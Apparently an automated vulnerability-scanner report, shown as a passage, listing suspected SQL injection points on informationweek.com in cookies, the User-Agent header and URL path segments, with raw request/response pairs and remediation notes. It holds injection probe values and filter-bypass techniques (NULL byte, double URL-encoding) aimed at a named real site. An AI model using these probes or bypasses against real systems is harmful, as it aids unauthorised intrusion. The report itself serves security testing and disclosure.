GET /blog/main/archives/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333'; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:20 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:20 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 174152
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Wolfe's Den Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robot ...[SNIP]... <p>Former counter-terrorism advisor Richard Clarke has a new book out, and it's scary stuff for all of us concerned about the national security of the United States. Scarier still, the alarms sounded by the book -- "Cyber War ...[SNIP]...
Request 2
GET /blog/main/archives/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333''; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:22 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:22 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/wolfes_den/index.html&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv_s cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv_s cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /blog/main/archives/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%00';
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:29 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:29 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 174152
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Wolfe's Den Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robot ...[SNIP]... <p>Former counter-terrorism advisor Richard Clarke has a new book out, and it's scary stuff for all of us concerned about the national security of the United States. Scarier still, the alarms sounded by the book -- "Cyber War ...[SNIP]...
Request 2
GET /blog/main/archives/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%00'';
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/wolfes_den/index.html&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /events/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 100432
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... </strong> you ensure increased productivity, eliminate errors, deliver the right resolution on the first attempt and most importantly add value to customers, prospects and your bottom line. <strong> ...[SNIP]...
Request 2
GET /events/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:20:43 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:43 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/events/index.jhtml&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /events/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:01 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:01 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 100431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... </strong> you ensure increased productivity, eliminate errors, deliver the right resolution on the first attempt and most importantly add value to customers, prospects and your bottom line. <strong> ...[SNIP]...
Request 2
GET /events/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:20:02 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:02 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/events/index.jhtml&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /events/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:19:50 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:19:50 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 100431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... </strong> you ensure increased productivity, eliminate errors, deliver the right resolution on the first attempt and most importantly add value to customers, prospects and your bottom line. <strong> ...[SNIP]...
Request 2
GET /events/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:19:51 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:19:51 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/events/index.jhtml&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /newsletters'/DR_subscribe.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:33 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:33 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29746
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /newsletters''/DR_subscribe.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:35 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:35 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/newsletters''/DR_subscribe.jhtml&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security'/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:29 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:29 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30117
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /video/security''/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security''/&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:32 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:32 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 69110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:33 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:33 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/index.jhtml&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the iwkbtn_emc_101111 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video/security/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%2527; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:37 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:37 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 69110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%2527%2527; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:39 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:39 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/index.jhtml&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video/security%2527/20979809001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:18 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:18 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 96430
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>There are lots of problems with using Spans ports, and usage is starting to decline, especially because they can introduce errors. Net Optics Director provides a better return on investement because it can isolate key traffic.</span> ...[SNIP]...
Request 2
